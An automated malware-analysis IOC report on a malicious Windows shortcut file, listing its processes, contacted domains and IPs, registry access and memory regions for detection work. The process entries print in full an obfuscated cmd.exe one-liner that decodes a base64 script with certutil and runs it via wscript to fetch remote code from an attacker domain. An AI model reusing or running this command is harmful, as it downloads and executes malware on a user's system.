Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH!

Details

Is windows:	true
Is dropped:	false
PID:	5016
Target ID:	1
Parent PID:	3960
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH!
Size:	273920
MD5:	4E2ACF4F8A396486AB4268C94A6A245F
Time:	07:20:59
Date:	01/02/2023
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff632260000
Modulesize:	405504
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Obfuscated command line found	Data Obfuscation	Command and Scripting Interpreter Deobfuscate/Decode Files or Information
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

C:\Windows\System32\wscript.exe

"C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS"

Details

Is windows:	true
Is dropped:	false
PID:	4664
Target ID:	3
Parent PID:	5016
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	"C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS"
Size:	163840
MD5:	9A68ADD12EB50DDE7586782C3EB9FF9C
Time:	07:21:00
Date:	01/02/2023
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6a0cb0000
Modulesize:	180224
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

C:\Windows\System32\certutil.exe

cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS

Details

Is windows:	true
Is dropped:	false
PID:	2400
Target ID:	2
Parent PID:	5016
Name:	certutil.exe
Class:	system-tools
Path:	C:\Windows\System32\certutil.exe
Commandline:	cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS
Size:	1557504
MD5:	EB199893441CED4BBBCB547FE411CF2D
Time:	07:20:59
Date:	01/02/2023
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff767370000
Modulesize:	1589248
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://a8eiy8.innovationsinsight.cyou/?3/

188.114.96.3

http://a8eiy8.innovationsinsight.cyou/

unknown

hTtP://a8eiy8.innovationsinsight.cyou/?3/l

unknown

https://www.cloudflare.com/g

unknown

https://www.cloudflare.com/

unknown

https://www.cloudflare.com/cdn-cgi/error

104.16.123.96

https://www.cloudflare.com/cdn-cgi/errorfM

unknown

https://www.cloudflare.com/cdn-cgi/errore.com/

unknown

https://www.cloudflare.com/cdn-cgi/errorT

unknown

hTtP://a8eiy8.innovationsinsight.cyou/?3/

unknown

Domains

Name

Malicious

a8eiy8.innovationsinsight.cyou

188.114.96.3

Details

Name:	a8eiy8.innovationsinsight.cyou
IP:	188.114.96.3
TargetID:	3
Current Path:	C:\Windows\System32\wscript.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic	Networking
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

www.cloudflare.com

104.16.123.96

Details

Name:	www.cloudflare.com
IP:	104.16.123.96
TargetID:	3
Current Path:	C:\Windows\System32\wscript.exe
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

IPs

Domain

Country

Malicious

188.114.96.3

a8eiy8.innovationsinsight.cyou

European Union

Details

IP:	188.114.96.3
TargetID:	3
Current Path:	C:\Windows\System32\wscript.exe
Country:	European Union
Countrycode:	EU
ASN number:	13335
ASN name:	CLOUDFLARENETUS
Private:	false
Domain:	a8eiy8.innovationsinsight.cyou

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic	Networking
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection

104.16.123.96

www.cloudflare.com

United States

Details

IP:	104.16.123.96
TargetID:	3
Current Path:	C:\Windows\System32\wscript.exe
Country:	United States
Countrycode:	USA
ASN number:	13335
ASN name:	CLOUDFLARENETUS
Private:	false
Domain:	www.cloudflare.com

Signature Hits	Behavior Group	Mitre Attack
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection
Uses secure TLS version for HTTPS connections	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

LangID

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Windows\System32\WScript.exe.FriendlyAppName

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Windows\System32\WScript.exe.ApplicationCompany

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7

Name

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7

Name

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7

Name

Memdumps

Base Address

Regiontype

Protect

Malicious

1D5B8D09000

heap

page read and write

1D5BAAD0000

remote allocation

page read and write

1D5BAAD0000

remote allocation

page read and write

1D5B8D03000

heap

page read and write

26B1CCE0000

heap

page read and write

1D5BC490000

heap

page read and write

1D5B8A90000

heap

page read and write

1D5B8C60000

heap

page read and write

814AEFE000

stack

page read and write

1D5B8E15000

heap

page read and write

1D5B8E10000

heap

page read and write

B90AEF9000

stack

page read and write

B90AAFE000

stack

page read and write

1D5B8C9A000

heap

page read and write

1D5B8D58000

heap

page read and write

1D5B8D11000

heap

page read and write

1D5B8D27000

heap

page read and write

1D5BAAD0000

remote allocation

page read and write

26B1D0B0000

heap

page read and write

26B1CDD0000

heap

page read and write

B90ADFF000

stack

page read and write

1D5B8C8A000

heap

page read and write

26B1CD50000

heap

page read and write

B90A8F6000

stack

page read and write

1D5B8D5A000

heap

page read and write

1D5B8D1D000

heap

page read and write

1D5B8D5A000

heap

page read and write

1D5B8D58000

heap

page read and write

1D5B8D09000

heap

page read and write

B90A9FE000

stack

page read and write

B90AFFE000

stack

page read and write

814AB8E000

stack

page read and write

1D5BAAED000

heap

page read and write

1D5B8D5A000

heap

page read and write

1D5B8C68000

heap

page read and write

1D5B8C8B000

heap

page read and write

1D5B8D11000

heap

page read and write

1D5BAAED000

heap

page read and write

B90B1FE000

stack

page read and write

1D5B8C9B000

heap

page read and write

26B1ECF0000

heap

page read and write

1D5B8D03000

heap

page read and write

1D5B8D2A000

heap

page read and write

26B1D0B5000

heap

page read and write

1D5B8E1E000

heap

page read and write

1D5B8D11000

heap

page read and write

1D5BAB08000

heap

page read and write

26B1ED40000

heap

page read and write

1D5B8C93000

heap

page read and write

1D5B8BD0000

heap

page read and write

B90B0FF000

stack

page read and write

814AB0C000

stack

page read and write

1D5B8D03000

heap

page read and write

1D5B8D0D000

heap

page read and write

1D5B8C93000

heap

page read and write

B90B2FE000

stack

page read and write

1D5BA9C0000

heap

page read and write

26B1CDD8000

heap

page read and write

B90B3FF000

stack

page read and write

1D5B8D58000

heap

page read and write

1D5B8CE5000

heap

page read and write

1D5B8C24000

heap

page read and write

1D5B8D1D000

heap

page read and write

1D5BAB08000

heap

page read and write

1D5B8DF0000

trusted library section

page readonly

1D5B8C93000

heap

page read and write

1D5B8D2A000

heap

page read and write

1D5B8C20000

heap

page read and write

1D5B8BF0000

heap

page read and write

B90ACFE000

stack

page read and write

1D5B8C88000

heap

page read and write

814AE7E000

stack

page read and write

1D5BAAEA000

heap

page read and write

1D5B8D2A000

heap

page read and write

1D5BC600000

trusted library allocation

page read and write

1D5BA9C5000

heap

page read and write

26B1CD70000

heap

page read and write

1D5B8D20000

heap

page read and write

1D5B8D09000

heap

page read and write

1D5BAAD0000

heap

page read and write

There are 70 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
gzLeH3Dmtn.lnk

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportgzLeH3Dmtn.lnk

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
gzLeH3Dmtn.lnk